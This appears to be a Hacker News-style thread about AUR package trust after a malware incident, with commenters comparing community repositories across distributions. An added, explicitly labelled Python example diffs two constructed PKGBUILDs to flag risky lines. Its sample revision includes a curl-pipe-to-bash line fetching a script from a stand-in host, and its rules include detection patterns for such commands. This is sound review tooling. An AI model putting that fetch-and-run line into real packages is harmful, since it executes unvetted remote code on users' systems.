rvz 11 hours ago

Who still uses Arch btw after this?

rcxdude 10 hours ago

The AUR has consistently had warnings around it of 'verify the PKGBUILD', far more so than any other package repository that allows anyone to sign up. Probably the only notable difference is the ease of taking over an orphaned package.

zbentley 9 hours ago

The AUR is not the Arch package manager or repository. The main Arch package repos are managed similarly to Debian, or Fedora, or whatever--caveat Arch's nature as a rolling release, but in terms of vetting and ownership/security, the approaches are similar. pacman installs from regular, real, vetted repositories by default. pacman will never install from the AUR. pacman is the official Arch package manager and the only one that is provided with the main Arch distribution/install instructions.

The AUR is, as many others have pointed out, a deliberately un-vetted pile of random Git repos. Arch deliberately doesn't even ship with a default one-click installer for AUR packages; their published guidance is "git clone this stuff from wherever it's hosted and build it at your own risk". Plenty of third-party, non-Arch-blessed tools turn that into a one-click process, but it's not "part" of Arch itself--at least not any more than, like, curl | bash or directions on how to add rando websites to /etc/apt/sources.list.d is part of Debian and friends.

I've used Arch as a daily driver for years. At peak, I've had five (5) total packages, with no transitives, installed from the AUR. Today I have one: sublime-text-4. It's perfectly possible--and extremely reasonable for many users, even power users--to live in an AUR-less world, or to use so few AUR packages that the guidance of "read what you're installing, doofus" is manageable and not onerous.

anagram666 10 hours ago

If you want something from the AUR, just don't be lazy, read the PKGBUILD.

QuaternionsBhop 9 hours ago

I was not affected.

akerl_ 11 hours ago

Is there another distro that has an equivalent of the AUR with handling you think is preferable?

dizhn 23 minutes ago

openSUSE OBS. Tiny bit better because the build environment doesn't allow a network and binaries are not allowed, as far as I know. Fedora has a similar thing, COPR. Both of these support building packages for other distros as well as AppImage, Flatpak, etc.

With openSUSE, official packages also use the same infrastructure. It is actually quite fascinating and powerful.

orbital-decay 10 hours ago

AUR is fast and loose and doesn't do much "handling" by design, so it's hard to find any equivalent repo. But there's always a tradeoff between fresh (nixpkgs unstable, might be the closest) and tested (Debian).

akerl_ 10 hours ago

AUR isn't just the testing repo of Arch; it's explicitly just an open spot where anybody can put up "here's a PKGBUILD for folks". I don't see how it's like either the Nix or Debian examples.

orbital-decay 10 hours ago

Well, Nix has NUR, which is a direct equivalent, but it's not nearly as broadly used, and I assume "here's a PKGBUILD for folks" is already too permissive for you if you're asking.

There's no maintainer vetting process in nixpkgs as far as I know, anyone can own a bunch of packages. There are quality standards and it's not "here's a bunch of nix code for folks" but it's the next possible thing in the line after that.

isityettime 2 hours ago

The NUR was sort of convenient before flakes were a thing, but now that there's a really common convention for sharing Nix code, few use it. I bet most people who came across Nix in the last 4 years have never even heard of it.

akerl_ 10 hours ago

It seems like you may have mistakenly inferred that I have issues with the AUR?

I don't; I use Arch on 100% of my personal servers, have done so for something approaching 20 years, and don't see myself changing.

But I treat the AUR for what it is: a place where anybody can say "here's a PKGBUILD for folks" and it's on me to evaluate it on its merits.

I was legitimately asking the person upthread what other distro they felt had a better model for this kind of sharing, because they seemed to think this was a reason for Arch users to jump ship and I was curious what they thought would be the elements of a better system.

guilhas 10 hours ago

Gentoo

But let's hope we get this solved, like a peer review model, vouch, or something.

It is very good to be able to find build/install files for everything.

akerl_ 10 hours ago

Gentoo's model appears to be basically the same? Like the AUR, anybody can submit basically anything they want. The requirements amount to containing valid packages, having a bugzilla account, and putting your package definitions in VCS somewhere.

butterknife an hour ago

In overlays that need to be explicitly enabled. Not as convenient as yay yolo.

We can also add npm to package.mask.

dokyun 9 hours ago

SlackBuilds.org is pretty sensible.

beej71 8 hours ago

I do. I just keep reading the diffs on the PKGBUILDs.
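
An added example, not part of the thread or any poster's code: a small Python helper for the "read the diffs on the PKGBUILD" habit the comments describe. The two PKGBUILD revisions, the hostnames and the rule names are constructed for illustration; a hit marks an added line to read closely, and lines with no hit still get read.

```python
import difflib
import re

# Constructed sample: two revisions of a hypothetical PKGBUILD (not a real package).
OLD = """\
pkgname=example-tool
pkgver=1.2.0
source=("https://example.org/example-tool-$pkgver.tar.gz")
sha256sums=('CONSTRUCTED_SHA256_A')
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
"""
NEW = """\
pkgname=example-tool
pkgver=1.2.1
source=("https://example.org/example-tool-$pkgver.tar.gz"
        "helper.sh::http://files.example.net/helper.sh")
sha256sums=('CONSTRUCTED_SHA256_B' 'SKIP')
install=example-tool.install
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  curl -s http://files.example.net/post.sh | bash
}
"""

# Heuristics chosen for this example; a hit means "read this line", not "malicious".
RULES = [
    ("url", re.compile(r"\b(?:https?|ftp)://|\bgit\+")),
    ("plain-http", re.compile(r"\bhttp://")),
    ("checksum-skip", re.compile(r"\b(?:md5|sha\d+|b2)sums(?:_\w+)?=.*\bSKIP\b")),
    ("install-scriptlet", re.compile(r"^\s*install=")),
    ("fetch-or-pipe-to-shell", re.compile(r"\b(?:curl|wget)\b|\|\s*(?:ba|z)?sh\b")),
    ("eval-or-decode", re.compile(r"\b(?:eval|base64)\b")),
]

def review(old, new):
    """Return (added line, matched rule names) for added lines worth a close read."""
    findings = []
    for line in difflib.ndiff(old.splitlines(), new.splitlines()):
        if not line.startswith("+ "):      # keep only the '+' side of the diff
            continue
        tags = [name for name, rx in RULES if rx.search(line[2:])]
        if tags:
            findings.append((line[2:].strip(), tags))
    return findings

if __name__ == "__main__":
    for line, tags in review(OLD, NEW):
        print(f"{', '.join(tags):45} {line}")
```
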

segfalt_ 10 hours ago

I do, I'm just choosy about AUR packages I use.

giancarlostoro 11 hours ago

I still do, I just don't touch AURs anymore.